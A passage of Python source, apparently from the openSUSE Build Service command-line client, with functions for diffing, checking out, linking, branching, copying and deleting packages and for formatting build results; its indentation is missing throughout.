import hashlib
md5 = hashlib
except ImportError:
import md5
md5 = md5
s = md5.md5()
f = open(file, 'rb')
while True:
buf = f.read(BUFSIZE)
if not buf: break
s.update(buf)
return s.hexdigest()
f.close()
def binary(s):
"""return true if a string is binary data using diff's heuristic"""
if s and bytes('\0', "utf-8") in s[:4096]:
return True
return False
def binary_file(fn):
"""read 4096 bytes from a file named fn, and call binary() on the data"""
return binary(open(fn, 'rb').read(4096))
def get_source_file_diff(dir, filename, rev, oldfilename = None, olddir = None, origfilename = None):
"""
This methods diffs oldfilename against filename (so filename will
be shown as the new file).
The variable origfilename is used if filename and oldfilename differ
in their names (for instance if a tempfile is used for filename etc.)
"""
import difflib
global store
if not oldfilename:
oldfilename = filename
if not olddir:
olddir = os.path.join(dir, store)
if not origfilename:
origfilename = filename
file1 = os.path.join(olddir, oldfilename) # old/stored original
file2 = os.path.join(dir, filename) # working copy
if binary_file(file1) or binary_file(file2):
return ['Binary file \'%s\' has changed.\n' % origfilename]
f1 = f2 = None
try:
f1 = open(file1, 'rt')
s1 = f1.readlines()
f1.close()
f2 = open(file2, 'rt')
s2 = f2.readlines()
f2.close()
finally:
if f1:
f1.close()
if f2:
f2.close()
d = difflib.unified_diff(s1, s2,
fromfile = '%s\t(revision %s)' % (origfilename, rev), \
tofile = '%s\t(working copy)' % origfilename)
d = list(d)
# python2.7's difflib slightly changed the format
# adapt old format to the new format
if len(d) > 1:
d[0] = d[0].replace(' \n', '\n')
d[1] = d[1].replace(' \n', '\n')
# if file doesn't end with newline, we need to append one in the diff result
for i, line in enumerate(d):
if not line.endswith('\n'):
d[i] += '\n\\ No newline at end of file'
if i+1 != len(d):
d[i] += '\n'
return d
def server_diff(apiurl,
old_project, old_package, old_revision,
new_project, new_package, new_revision,
unified=False, missingok=False, meta=False, expand=True, onlyissues=False, full=True):
query = {'cmd': 'diff'}
if expand:
query['expand'] = 1
if old_project:
query['oproject'] = old_project
if old_package:
query['opackage'] = old_package
if old_revision:
query['orev'] = old_revision
if new_revision:
query['rev'] = new_revision
if unified:
query['unified'] = 1
if missingok:
query['missingok'] = 1
if meta:
query['meta'] = 1
if full:
query['filelimit'] = 0
query['tarlimit'] = 0
if onlyissues:
query['onlyissues'] = 1
query['view'] = 'xml'
query['unified'] = 0
u = makeurl(apiurl, ['source', new_project, new_package], query=query)
f = http_POST(u)
if onlyissues:
issue_list = []
root = ET.fromstring(f.read())
node = root.find('issues')
for issuenode in node.findall('issue'):
issue_list.append(issuenode.get('label'))
return '\n'.join(issue_list)
return f.read()
def server_diff_noex(apiurl,
old_project, old_package, old_revision,
new_project, new_package, new_revision,
unified=False, missingok=False, meta=False, expand=True, onlyissues=False):
try:
return server_diff(apiurl,
old_project, old_package, old_revision,
new_project, new_package, new_revision,
unified, missingok, meta, expand, onlyissues)
except HTTPError as e:
msg = None
body = None
try:
body = e.read()
if not 'bad link' in body:
return '# diff failed: ' + body
except:
return '# diff failed with unknown error'
if expand:
rdiff = "## diff on expanded link not possible, showing unexpanded version\n"
try:
rdiff += server_diff_noex(apiurl,
old_project, old_package, old_revision,
new_project, new_package, new_revision,
unified, missingok, meta, False)
except:
elm = ET.fromstring(body).find('summary')
summary = ''
if not elm is None:
summary = elm.text
return 'error: diffing failed: %s' % summary
return rdiff
def request_diff(apiurl, reqid):
u = makeurl(apiurl, ['request', reqid], query={'cmd': 'diff'} )
f = http_POST(u)
return f.read()
def submit_action_diff(apiurl, action):
"""diff a single submit action"""
# backward compatiblity: only a recent api/backend supports the missingok parameter
try:
return server_diff(apiurl, action.tgt_project, action.tgt_package, None,
action.src_project, action.src_package, action.src_rev, True, True)
except HTTPError as e:
if e.code == 400:
try:
return server_diff(apiurl, action.tgt_project, action.tgt_package, None,
action.src_project, action.src_package, action.src_rev, True, False)
except HTTPError as e:
if e.code != 404:
raise e
root = ET.fromstring(e.read())
return 'error: \'%s\' does not exist' % root.find('summary').text
elif e.code == 404:
root = ET.fromstring(e.read())
return 'error: \'%s\' does not exist' % root.find('summary').text
raise e
def make_dir(apiurl, project, package, pathname=None, prj_dir=None, package_tracking=True, pkg_path=None):
"""
creates the plain directory structure for a package dir.
The 'apiurl' parameter is needed for the project dir initialization.
The 'project' and 'package' parameters specify the name of the
project and the package. The optional 'pathname' parameter is used
for printing out the message that a new dir was created (default: 'prj_dir/package').
The optional 'prj_dir' parameter specifies the path to the project dir (default: 'project').
If pkg_path is not None store the package's content in pkg_path (no project structure is created)
"""
prj_dir = prj_dir or project
# FIXME: carefully test each patch component of prj_dir,
# if we have a .osc/_files entry at that level.
# -> if so, we have a package/project clash,
# and should rename this path component by appending '.proj'
# and give user a warning message, to discourage such clashes
if pkg_path is None:
pathname = pathname or getTransActPath(os.path.join(prj_dir, package))
pkg_path = os.path.join(prj_dir, package)
if is_package_dir(prj_dir):
# we want this to become a project directory,
# but it already is a package directory.
raise oscerr.OscIOError(None, 'checkout_package: package/project clash. Moving myself away not implemented')
if not is_project_dir(prj_dir):
# this directory could exist as a parent direory for one of our earlier
# checked out sub-projects. in this case, we still need to initialize it.
print(statfrmt('A', prj_dir))
Project.init_project(apiurl, prj_dir, project, package_tracking)
if is_project_dir(os.path.join(prj_dir, package)):
# the thing exists, but is a project directory and not a package directory
# FIXME: this should be a warning message to discourage package/project clashes
raise oscerr.OscIOError(None, 'checkout_package: package/project clash. Moving project away not implemented')
else:
pathname = pkg_path
if not os.path.exists(pkg_path):
print(statfrmt('A', pathname))
os.mkdir(os.path.join(pkg_path))
# os.mkdir(os.path.join(prj_dir, package, store))
return pkg_path
def checkout_package(apiurl, project, package,
revision=None, pathname=None, prj_obj=None,
expand_link=False, prj_dir=None, server_service_files = None, service_files=None, progress_obj=None, size_limit=None, meta=False, outdir=None):
try:
# the project we're in might be deleted.
# that'll throw an error then.
olddir = os.getcwd()
except:
olddir = os.environ.get("PWD")
if not prj_dir:
prj_dir = olddir
else:
if sys.platform[:3] == 'win':
prj_dir = prj_dir[:2] + prj_dir[2:].replace(':', ';')
else:
if conf.config['checkout_no_colon']:
prj_dir = prj_dir.replace(':', '/')
root_dots = '.'
if conf.config['checkout_rooted']:
if prj_dir[:1] == '/':
if conf.config['verbose'] > 1:
print("checkout_rooted ignored for %s" % prj_dir)
# ?? should we complain if not is_project_dir(prj_dir) ??
else:
# if we are inside a project or package dir, ascend to parent
# directories, so that all projects are checked out relative to
# the same root.
if is_project_dir(".."):
# if we are in a package dir, goto parent.
# Hmm, with 'checkout_no_colon' in effect, we have directory levels that
# do not easily reveal the fact, that they are part of a project path.
# At least this test should find that the parent of 'home/username/branches'
# is a project (hack alert). Also goto parent in this case.
root_dots = "../"
elif is_project_dir("../.."):
# testing two levels is better than one.
# May happen in case of checkout_no_colon, or
# if project roots were previously inconsistent
root_dots = "../../"
if is_project_dir(root_dots):
oldproj = store_read_project(root_dots)
if conf.config['checkout_no_colon']:
n = len(oldproj.split(':'))
else:
n = 1
if root_dots == '.':
root_dots = ''
root_dots = root_dots + "../" * n
if root_dots != '.':
if conf.config['verbose']:
print("%s is project dir of %s. Root found at %s" %
(prj_dir, oldproj, os.path.abspath(root_dots)))
prj_dir = root_dots + prj_dir
if not pathname:
pathname = getTransActPath(os.path.join(prj_dir, package))
# before we create directories and stuff, check if the package actually
# exists
show_package_meta(apiurl, quote_plus(project), quote_plus(package), meta)
isfrozen = False
if expand_link:
# try to read from the linkinfo
# if it is a link we use the xsrcmd5 as the revision to be
# checked out
try:
x = show_upstream_xsrcmd5(apiurl, project, package, revision=revision, meta=meta, include_service_files=server_service_files)
except:
x = show_upstream_xsrcmd5(apiurl, project, package, revision=revision, meta=meta, linkrev='base', include_service_files=server_service_files)
if x:
isfrozen = True
if x:
revision = x
directory = make_dir(apiurl, project, package, pathname, prj_dir, conf.config['do_package_tracking'], outdir)
p = Package.init_package(apiurl, project, package, directory, size_limit, meta, progress_obj)
if isfrozen:
p.mark_frozen()
# no project structure is wanted when outdir is used
if conf.config['do_package_tracking'] and outdir is None:
# check if we can re-use an existing project object
if prj_obj is None:
prj_obj = Project(prj_dir)
prj_obj.set_state(p.name, ' ')
prj_obj.write_packages()
p.update(revision, server_service_files, size_limit)
if service_files:
print('Running all source services local')
p.run_source_services()
def replace_pkg_meta(pkgmeta, new_name, new_prj, keep_maintainers = False,
dst_userid = None, keep_develproject = False):
"""
update pkgmeta with new new_name and new_prj and set calling user as the
only maintainer (unless keep_maintainers is set). Additionally remove the
develproject entry (<devel />) unless keep_develproject is true.
"""
root = ET.fromstring(''.join(pkgmeta))
root.set('name', new_name)
root.set('project', new_prj)
# never take releasename, it needs to be explicit
for releasename in root.findall('releasename'):
root.remove(releasename)
if not keep_maintainers:
for person in root.findall('person'):
root.remove(person)
if not keep_develproject:
for dp in root.findall('devel'):
root.remove(dp)
return ET.tostring(root, encoding=ET_ENCODING)
def link_to_branch(apiurl, project, package):
"""
convert a package with a _link + project.diff to a branch
"""
if '_link' in meta_get_filelist(apiurl, project, package):
u = makeurl(apiurl, ['source', project, package], 'cmd=linktobranch')
http_POST(u)
else:
raise oscerr.OscIOError(None, 'no _link file inside project \'%s\' package \'%s\'' % (project, package))
def link_pac(src_project, src_package, dst_project, dst_package, force, rev='', cicount='', disable_publish = False, missing_target = False, vrev=''):
"""
create a linked package
- "src" is the original package
- "dst" is the "link" package that we are creating here
"""
meta_change = False
dst_meta = ''
apiurl = conf.config['apiurl']
try:
dst_meta = meta_exists(metatype='pkg',
path_args=(quote_plus(dst_project), quote_plus(dst_package)),
template_args=None,
create_new=False, apiurl=apiurl)
root = ET.fromstring(''.join(dst_meta))
if root.get('project') != dst_project:
# The source comes from a different project via a project link, we need to create this instance
meta_change = True
except:
meta_change = True
if meta_change:
if missing_target:
dst_meta = '<package name="%s"><title/><description/></package>' % dst_package
else:
src_meta = show_package_meta(apiurl, src_project, src_package)
dst_meta = replace_pkg_meta(src_meta, dst_package, dst_project)
if disable_publish:
meta_change = True
root = ET.fromstring(''.join(dst_meta))
elm = root.find('publish')
if not elm:
elm = ET.SubElement(root, 'publish')
elm.clear()
ET.SubElement(elm, 'disable')
dst_meta = ET.tostring(root, encoding=ET_ENCODING)
if meta_change:
edit_meta('pkg',
path_args=(dst_project, dst_package),
data=dst_meta)
# create the _link file
# but first, make sure not to overwrite an existing one
if '_link' in meta_get_filelist(apiurl, dst_project, dst_package):
if force:
print('forced overwrite of existing _link file', file=sys.stderr)
else:
print(file=sys.stderr)
print('_link file already exists...! Aborting', file=sys.stderr)
sys.exit(1)
if rev:
rev = ' rev="%s"' % rev
else:
rev = ''
if vrev:
vrev = ' vrev="%s"' % vrev
else:
vrev = ''
missingok = ''
if missing_target:
missingok = ' missingok="true"'
if cicount:
cicount = ' cicount="%s"' % cicount
else:
cicount = ''
print('Creating _link...', end=' ')
project = ''
if src_project != dst_project:
project = 'project="%s"' % src_project
link_template = """\
<link %s package="%s"%s%s%s%s>
<patches>
<!-- <branch /> for a full copy, default case -->
<!-- <apply name="patch" /> apply a patch on the source directory -->
<!-- <topadd>%%define build_with_feature_x 1</topadd> add a line on the top (spec file only) -->
<!-- <add name="file.patch" /> add a patch to be applied after %%setup (spec file only) -->
<!-- <delete name="filename" /> delete a file -->
</patches>
</link>
""" % (project, src_package, missingok, rev, vrev, cicount)
u = makeurl(apiurl, ['source', dst_project, dst_package, '_link'])
http_PUT(u, data=link_template)
print('Done.')
def aggregate_pac(src_project, src_package, dst_project, dst_package, repo_map = {}, disable_publish = False, nosources = False):
"""
aggregate package
- "src" is the original package
- "dst" is the "aggregate" package that we are creating here
- "map" is a dictionary SRC => TARGET repository mappings
"""
meta_change = False
dst_meta = ''
apiurl = conf.config['apiurl']
try:
dst_meta = meta_exists(metatype='pkg',
path_args=(quote_plus(dst_project), quote_plus(dst_package)),
template_args=None,
create_new=False, apiurl=apiurl)
root = ET.fromstring(''.join(dst_meta))
if root.get('project') != dst_project:
# The source comes from a different project via a project link, we need to create this instance
meta_change = True
except:
meta_change = True
if meta_change:
src_meta = show_package_meta(apiurl, src_project, src_package)
dst_meta = replace_pkg_meta(src_meta, dst_package, dst_project)
meta_change = True
if disable_publish:
meta_change = True
root = ET.fromstring(''.join(dst_meta))
elm = root.find('publish')
if not elm:
elm = ET.SubElement(root, 'publish')
elm.clear()
ET.SubElement(elm, 'disable')
dst_meta = ET.tostring(root, encoding=ET_ENCODING)
if meta_change:
edit_meta('pkg',
path_args=(dst_project, dst_package),
data=dst_meta)
# create the _aggregate file
# but first, make sure not to overwrite an existing one
if '_aggregate' in meta_get_filelist(apiurl, dst_project, dst_package):
print(file=sys.stderr)
print('_aggregate file already exists...! Aborting', file=sys.stderr)
sys.exit(1)
print('Creating _aggregate...', end=' ')
aggregate_template = """\
<aggregatelist>
<aggregate project="%s">
""" % (src_project)
aggregate_template += """\
<package>%s</package>
""" % ( src_package)
if nosources:
aggregate_template += """\
<nosources />
"""
for src, tgt in repo_map.items():
aggregate_template += """\
<repository target="%s" source="%s" />
""" % (tgt, src)
aggregate_template += """\
</aggregate>
</aggregatelist>
"""
u = makeurl(apiurl, ['source', dst_project, dst_package, '_aggregate'])
http_PUT(u, data=aggregate_template)
print('Done.')
def attribute_branch_pkg(apiurl, attribute, maintained_update_project_attribute, package, targetproject, return_existing=False, force=False, noaccess=False, add_repositories=False, dryrun=False, nodevelproject=False, maintenance=False):
"""
Branch packages defined via attributes (via API call)
"""
query = { 'cmd': 'branch' }
query['attribute'] = attribute
if targetproject:
query['target_project'] = targetproject
if dryrun:
query['dryrun'] = "1"
if force:
query['force'] = "1"
if noaccess:
query['noaccess'] = "1"
if nodevelproject:
query['ignoredevel'] = '1'
if add_repositories:
query['add_repositories'] = "1"
if maintenance:
query['maintenance'] = "1"
if package:
query['package'] = package
if maintained_update_project_attribute:
query['update_project_attribute'] = maintained_update_project_attribute
u = makeurl(apiurl, ['source'], query=query)
f = None
try:
f = http_POST(u)
except HTTPError as e:
root = ET.fromstring(e.read())
summary = root.find('summary')
if summary is not None and summary.text is not None:
raise oscerr.APIError(summary.text)
msg = 'unexpected response: %s' % ET.tostring(root, encoding=ET_ENCODING)
raise oscerr.APIError(msg)
r = None
root = ET.fromstring(f.read())
if dryrun:
return root
# TODO: change api here and return parsed XML as class
if conf.config['http_debug']:
print(ET.tostring(root, encoding=ET_ENCODING), file=sys.stderr)
for node in root.findall('data'):
r = node.get('name')
if r and r == 'targetproject':
return node.text
return r
def branch_pkg(apiurl, src_project, src_package, nodevelproject=False, rev=None, linkrev=None, target_project=None, target_package=None, return_existing=False, msg='', force=False, noaccess=False, add_repositories=False, add_repositories_block=None, add_repositories_rebuild=None, extend_package_names=False, missingok=False, maintenance=False, newinstance=False):
"""
Branch a package (via API call)
"""
query = { 'cmd': 'branch' }
if nodevelproject:
query['ignoredevel'] = '1'
if force:
query['force'] = '1'
if noaccess:
query['noaccess'] = '1'
if add_repositories:
query['add_repositories'] = "1"
if add_repositories_block:
query['add_repositories_block'] = add_repositories_block
if add_repositories_rebuild:
query['add_repositories_rebuild'] = add_repositories_rebuild
if maintenance:
query['maintenance'] = "1"
if missingok:
query['missingok'] = "1"
if newinstance:
query['newinstance'] = "1"
if extend_package_names:
query['extend_package_names'] = "1"
if rev:
query['rev'] = rev
if linkrev:
query['linkrev'] = linkrev
if target_project:
query['target_project'] = target_project
if target_package:
query['target_package'] = target_package
if msg:
query['comment'] = msg
u = makeurl(apiurl, ['source', src_project, src_package], query=query)
try:
f = http_POST(u)
except HTTPError as e:
root = ET.fromstring(e.read())
if missingok:
if root and root.get('code') == "not_missing":
raise oscerr.NotMissing("Package exists already via project link, but link will point to given project")
summary = root.find('summary')
if summary is None:
raise oscerr.APIError('unexpected response:\n%s' % ET.tostring(root, encoding=ET_ENCODING))
if not return_existing:
raise oscerr.APIError('failed to branch: %s' % summary.text)
m = re.match(r"branch target package already exists: (\S+)/(\S+)", summary.text)
if not m:
e.msg += '\n' + summary.text
raise
return (True, m.group(1), m.group(2), None, None)
root = ET.fromstring(f.read())
if conf.config['http_debug']:
print(ET.tostring(root, encoding=ET_ENCODING), file=sys.stderr)
data = {}
for i in root.findall('data'):
data[i.get('name')] = i.text
return (False, data.get('targetproject', None), data.get('targetpackage', None),
data.get('sourceproject', None), data.get('sourcepackage', None))
def copy_pac(src_apiurl, src_project, src_package,
dst_apiurl, dst_project, dst_package,
client_side_copy = False,
keep_maintainers = False,
keep_develproject = False,
expand = False,
revision = None,
comment = None,
force_meta_update = None,
keep_link = None):
"""
Create a copy of a package.
Copying can be done by downloading the files from one package and commit
them into the other by uploading them (client-side copy) --
or by the server, in a single api call.
"""
if not (src_apiurl == dst_apiurl and src_project == dst_project \
and src_package == dst_package):
src_meta = show_package_meta(src_apiurl, src_project, src_package)
dst_userid = conf.get_apiurl_usr(dst_apiurl)
src_meta = replace_pkg_meta(src_meta, dst_package, dst_project, keep_maintainers,
dst_userid, keep_develproject)
url = make_meta_url('pkg', (quote_plus(dst_project),) + (quote_plus(dst_package),), dst_apiurl)
found = None
try:
found = http_GET(url).readlines()
except HTTPError as e:
pass
if force_meta_update or not found:
print('Sending meta data...')
u = makeurl(dst_apiurl, ['source', dst_project, dst_package, '_meta'])
http_PUT(u, data=src_meta)
print('Copying files...')
if not client_side_copy:
query = {'cmd': 'copy', 'oproject': src_project, 'opackage': src_package }
if expand or keep_link:
query['expand'] = '1'
if keep_link:
query['keeplink'] = '1'
if revision:
query['orev'] = revision
if comment:
query['comment'] = comment
u = makeurl(dst_apiurl, ['source', dst_project, dst_package], query=query)
f = http_POST(u)
return f.read()
else:
# copy one file after the other
import tempfile
query = {'rev': 'upload'}
xml = show_files_meta(src_apiurl, src_project, src_package,
expand=expand, revision=revision)
filelist = ET.fromstring(xml)
revision = filelist.get('srcmd5')
# filter out _service: files
for entry in filelist.findall('entry'):
# hmm the old code also checked for _service_ (but this is
# probably a relict from former times (if at all))
if entry.get('name').startswith('_service:'):
filelist.remove(entry)
tfilelist = Package.commit_filelist(dst_apiurl, dst_project,
dst_package, filelist, msg=comment)
todo = Package.commit_get_missing(tfilelist)
for filename in todo:
print(' ', filename)
# hmm ideally, we would pass a file-like (that delegates to
# streamfile) to http_PUT...
with tempfile.NamedTemporaryFile(prefix='osc-copypac') as f:
get_source_file(src_apiurl, src_project, src_package, filename,
targetfilename=f.name, revision=revision)
path = ['source', dst_project, dst_package, pathname2url(filename)]
u = makeurl(dst_apiurl, path, query={'rev': 'repository'})
http_PUT(u, file=f.name)
tfilelist = Package.commit_filelist(dst_apiurl, dst_project, dst_package,
filelist, msg=comment)
todo = Package.commit_get_missing(tfilelist)
if todo:
raise oscerr.APIError('failed to copy: %s' % ', '.join(todo))
return 'Done.'
def unlock_package(apiurl, prj, pac, msg):
query = {'cmd': 'unlock', 'comment': msg}
u = makeurl(apiurl, ['source', prj, pac], query)
http_POST(u)
def unlock_project(apiurl, prj, msg=None):
query = {'cmd': 'unlock', 'comment': msg}
u = makeurl(apiurl, ['source', prj], query)
http_POST(u)
def undelete_package(apiurl, prj, pac, msg=None):
query = {'cmd': 'undelete'}
if msg:
query['comment'] = msg
else:
query['comment'] = 'undeleted via osc'
u = makeurl(apiurl, ['source', prj, pac], query)
http_POST(u)
def undelete_project(apiurl, prj, msg=None):
query = {'cmd': 'undelete'}
if msg:
query['comment'] = msg
else:
query['comment'] = 'undeleted via osc'
u = makeurl(apiurl, ['source', prj], query)
http_POST(u)
def delete_package(apiurl, prj, pac, force=False, msg=None):
query = {}
if force:
query['force'] = "1"
if msg:
query['comment'] = msg
u = makeurl(apiurl, ['source', prj, pac], query)
http_DELETE(u)
def delete_project(apiurl, prj, force=False, msg=None):
query = {}
if force:
query['force'] = "1"
if msg:
query['comment'] = msg
u = makeurl(apiurl, ['source', prj], query)
http_DELETE(u)
def delete_files(apiurl, prj, pac, files):
for filename in files:
u = makeurl(apiurl, ['source', prj, pac, filename], query={'comment': 'removed %s' % (filename, )})
http_DELETE(u)
# old compat lib call
def get_platforms(apiurl):
return get_repositories(apiurl)
def get_repositories(apiurl):
f = http_GET(makeurl(apiurl, ['platform']))
tree = ET.parse(f)
r = sorted([ node.get('name') for node in tree.getroot() ])
return r
def get_distibutions(apiurl, discon=False):
r = []
# FIXME: this is just a naming convention on api.opensuse.org, but not a general valid apparoach
if discon:
result_line_templ = '%(name)-25s %(project)s'
f = http_GET(makeurl(apiurl, ['build']))
root = ET.fromstring(''.join(f))
for node in root.findall('entry'):
if node.get('name').startswith('DISCONTINUED:'):
rmap = {}
rmap['name'] = node.get('name').replace('DISCONTINUED:', '').replace(':', ' ')
rmap['project'] = node.get('name')
r.append (result_line_templ % rmap)
r.insert(0, 'distribution project')
r.insert(1, '------------ -------')
else:
result_line_templ = '%(name)-25s %(project)-25s %(repository)-25s %(reponame)s'
f = http_GET(makeurl(apiurl, ['distributions']))
root = ET.fromstring(''.join(f))
for node in root.findall('distribution'):
rmap = {}
for node2 in node.findall('name'):
rmap['name'] = node2.text
for node3 in node.findall('project'):
rmap['project'] = node3.text
for node4 in node.findall('repository'):
rmap['repository'] = node4.text
for node5 in node.findall('reponame'):
rmap['reponame'] = node5.text
r.append(result_line_templ % rmap)
r.insert(0, 'distribution project repository reponame')
r.insert(1, '------------ ------- ---------- --------')
return r
# old compat lib call
def get_platforms_of_project(apiurl, prj):
return get_repositories_of_project(apiurl, prj)
def get_repositories_of_project(apiurl, prj):
f = show_project_meta(apiurl, prj)
root = ET.fromstring(''.join(f))
r = [ node.get('name') for node in root.findall('repository')]
return r
class Repo:
repo_line_templ = '%-15s %-10s'
def __init__(self, name, arch):
self.name = name
self.arch = arch
def __str__(self):
return self.repo_line_templ % (self.name, self.arch)
def __repr__(self):
return 'Repo(%s %s)' % (self.name, self.arch)
@staticmethod
def fromfile(filename):
if not os.path.exists(filename):
return []
repos = []
lines = open(filename, 'r').readlines()
for line in lines:
data = line.split()
if len(data) == 2:
repos.append(Repo(data[0], data[1]))
elif len(data) == 1:
# only for backward compatibility
repos.append(Repo(data[0], ''))
return repos
@staticmethod
def tofile(filename, repos):
with open(filename, 'w') as f:
for repo in repos:
f.write('%s %s\n' % (repo.name, repo.arch))
def get_repos_of_project(apiurl, prj):
f = show_project_meta(apiurl, prj)
root = ET.fromstring(''.join(f))
for node in root.findall('repository'):
for node2 in node.findall('arch'):
yield Repo(node.get('name'), node2.text)
def get_binarylist(apiurl, prj, repo, arch, package=None, verbose=False):
what = package or '_repository'
u = makeurl(apiurl, ['build', prj, repo, arch, what])
f = http_GET(u)
tree = ET.parse(f)
if not verbose:
return [ node.get('filename') for node in tree.findall('binary')]
else:
l = []
for node in tree.findall('binary'):
f = File(node.get('filename'),
None,
int(node.get('size')),
int(node.get('mtime')))
l.append(f)
return l
def get_binarylist_published(apiurl, prj, repo, arch):
u = makeurl(apiurl, ['published', prj, repo, arch])
f = http_GET(u)
tree = ET.parse(f)
r = [ node.get('name') for node in tree.findall('entry')]
return r
def show_results_meta(apiurl, prj, package=None, lastbuild=None, repository=[], arch=[], oldstate=None, multibuild=False, locallink=False):
query = {}
if package:
query['package'] = package
if oldstate:
query['oldstate'] = oldstate
if lastbuild:
query['lastbuild'] = 1
if multibuild:
query['multibuild'] = 1
if locallink:
query['locallink'] = 1
u = makeurl(apiurl, ['build', prj, '_result'], query=query)
for repo in repository:
u = u + '&repository=%s' % repo
for a in arch:
u = u + '&arch=%s' % a
f = http_GET(u)
return f.readlines()
def show_prj_results_meta(apiurl, prj):
u = makeurl(apiurl, ['build', prj, '_result'])
f = http_GET(u)
return f.readlines()
def result_xml_to_dicts(xml):
# assumption: xml contains at most one status element (maybe we should
# generalize this to arbitrary status element)
root = ET.fromstring(xml)
for node in root.findall('result'):
rmap = {}
rmap['project'] = rmap['prj'] = node.get('project')
rmap['repository'] = rmap['repo'] = rmap['rep'] = node.get('repository')
rmap['arch'] = node.get('arch')
rmap['state'] = node.get('state')
rmap['dirty'] = node.get('dirty') == 'true'
rmap['repostate'] = node.get('code')
rmap['pkg'] = rmap['package'] = rmap['pac'] = ''
rmap['code'] = node.get('code')
rmap['details'] = ''
# the way we currently use this function, there should be
# always a status element
snodes = node.findall('status')
is_multi = len(snodes) > 1
if len(snodes) < 1:
# the repository setup is broken
smap = dict(rmap)
smap['pkg'] = "_repository"
smap['code'] = rmap['repostate']
smap['details'] = node.get('details')
yield smap, is_multi
continue
for statusnode in snodes:
smap = dict(rmap)
smap['pkg'] = smap['package'] = smap['pac'] = statusnode.get('package')
smap['code'] = statusnode.get('code', '')
details = statusnode.find('details')
if details is not None:
smap['details'] = details.text
yield smap, is_multi
def format_results(results, format):
"""apply selected format on each dict in results and return it as a list of strings"""
return [format % r for r in results]
def get_results(apiurl, project, package, verbose=False, printJoin='', *args, **kwargs):
"""returns list of/or prints a human readable status for the specified package"""
# hmm the function name is a bit too generic - something like
# get_package_results_human would be better, but this would break the existing
# api (unless we keep get_results around as well)...
result_line_templ = '%(rep)-20s %(arch)-10s %(status)s'
result_line_mb_templ = '%(rep)-20s %(arch)-10s %(pkg)-30s %(status)s'
r = []
printed = False
multibuild_packages = kwargs.pop('multibuild_packages', [])
show_excluded = kwargs.pop('showexcl', False)
for results in get_package_results(apiurl, project, package, **kwargs):
r = []
for res, is_multi in result_xml_to_dicts(results):
if not show_excluded and res['code'] == 'excluded':
continue
if '_oldstate' in res:
oldstate = res['_oldstate']
continue
if multibuild_packages:
l = res['pkg'].rsplit(':', 1)
if len(l) != 2 or l[1] not in multibuild_packages:
continue
res['status'] = res['code']
if verbose and res['details'] != '':
if res['code'] in ('unresolvable', 'expansion error'):
lines = res['details'].split(',')
res['status'] += ': ' + '\n '.join(lines)
else:
res['status'] += ': %s' % res['details']
elif res['code'] in ('scheduled', ) and res['details']:
# highlight scheduled jobs with possible dispatch problems
res['status'] += '*'
if res['dirty']:
if verbose:
res['status'] = 'outdated (was: %s)' % res['status']
else:
res['status'] += '*'
elif res['code'] in ('succeeded', ) and res['repostate'] != "published":
if verbose:
res['status'] += '(unpublished)'
else:
res['status'] += '*'
if is_multi:
r.append(result_line_mb_templ % res)
else:
r.append(result_line_templ % res)
if printJoin:
if printed:
# will print a newline if already a result was printed (improves readability)
print()
print(printJoin.join(r))
printed = True
return r
def get_package_results(apiurl, project, package, wait=False, *args, **kwargs):
"""generator that returns a the package results as an xml structure"""
xml = ''
waiting_states = ('blocked', 'scheduled', 'dispatching', 'building',
'signing', 'finished')
while True:
waiting = False
try:
xml = ''.join(show_results_meta(apiurl, project, package, *args, **kwargs))
except HTTPError as e:
# check for simple timeout error and fetch again
if e.code == 502 or e.code == 504:
# re-try result request
continue
root = ET.fromstring(e.read())
if e.code == 400 and kwargs.get('multibuild') and re.search('multibuild', getattr(root.find('summary'), 'text', '')):
kwargs['multibuild'] = None
kwargs['locallink'] = None
continue
raise
root = ET.fromstring(xml)
kwargs['oldstate'] = root.get('state')
for result in root.findall('result'):
if result.get('dirty') is not None:
waiting = True
break
elif result.get('code') in waiting_states:
waiting = True
break
else:
pkg = result.find('status')
if pkg is not None and pkg.get('code') in waiting_states:
waiting = True
break
if not wait or not waiting:
break
else:
yield xml
yield xml
def get_prj_results(apiurl, prj, hide_legend=False, csv=False, status_filter=None, name_filter=None, arch=None, repo=None, vertical=None, show_excluded=None):
#print '----------------------------------------'
global buildstatus_symbols
r = []
f = show_prj_results_meta(apiurl, prj)
root = ET.fromstring(''.join(f))
pacs = []
# sequence of (repo,arch) tuples
targets = []
# {package: {(repo,arch): status}}
status = {}
if root.find('result') == None:
return []
for results in root.findall('result'):
for node in results:
pacs.append(node.get('package'))
pacs = sorted(list(set(pacs)))
for node in root.findall('result'):
# filter architecture and repository
if arch != None and node.get('arch') not in arch:
continue
if repo != None and node.get('repository') not in repo:
continue
if node.get('dirty') == "true":
state = "outdated"
else:
state = node.get('state')
tg = (node.get('repository'), node.get('arch'), state)
targets.append(tg)
for pacnode in node.findall('status'):
pac = pacnode.get('package')
if pac not in status:
status[pac] = {}
status[pac][tg] = pacnode.get('code')
targets.sort()
# filter option
if status_filter or name_filter or not show_excluded:
pacs_to_show = []
targets_to_show = []
#filtering for Package Status
if status_filter:
if status_filter in buildstatus_symbols.values():
# a list is needed because if status_filter == "U"
# we have to filter either an "expansion error" (obsolete)
# or an "unresolvable" state
filters = []
for txt, sym in buildstatus_symbols.items():
if sym == status_filter:
filters.append(txt)
for filt_txt in filters:
for pkg in status.keys():
for repo in status[pkg].keys():
if status[pkg][repo] == filt_txt:
if not name_filter:
pacs_to_show.append(pkg)
targets_to_show.append(repo)
elif name_filter in pkg:
pacs_to_show.append(pkg)
#filtering for Package Name
elif name_filter:
for pkg in pacs:
if name_filter in pkg:
pacs_to_show.append(pkg)
#filter non building states
elif not show_excluded:
enabled = {}
for pkg in status.keys():
showpkg = False
for repo in status[pkg].keys():
if status[pkg][repo] != "excluded":
enabled[repo] = 1
showpkg = True
if showpkg:
pacs_to_show.append(pkg)
targets_to_show = enabled.keys()
pacs = [ i for i in pacs if i in pacs_to_show ]
if len(targets_to_show):
targets = [ i for i in targets if i in targets_to_show ]
# csv output
if csv:
# TODO: option to disable the table header
row = ['_'] + ['/'.join(tg) for tg in targets]
r.append(';'.join(row))
for pac in pacs:
row = [pac] + [status[pac][tg] for tg in targets if tg in status[pac]]
r.append(';'.join(row))
return r
if not vertical:
# human readable output
max_pacs = 40
for startpac in range(0, len(pacs), max_pacs):
offset = 0
for pac in pacs[startpac:startpac+max_pacs]:
r.append(' |' * offset + ' ' + pac)
offset += 1
for tg in targets:
line = []
line.append(' ')
for pac in pacs[startpac:startpac+max_pacs]:
st = ''
if pac not in status or tg not in status[pac]:
# for newly added packages, status may be missing
st = '?'
else:
try:
st = buildstatus_symbols[status[pac][tg]]
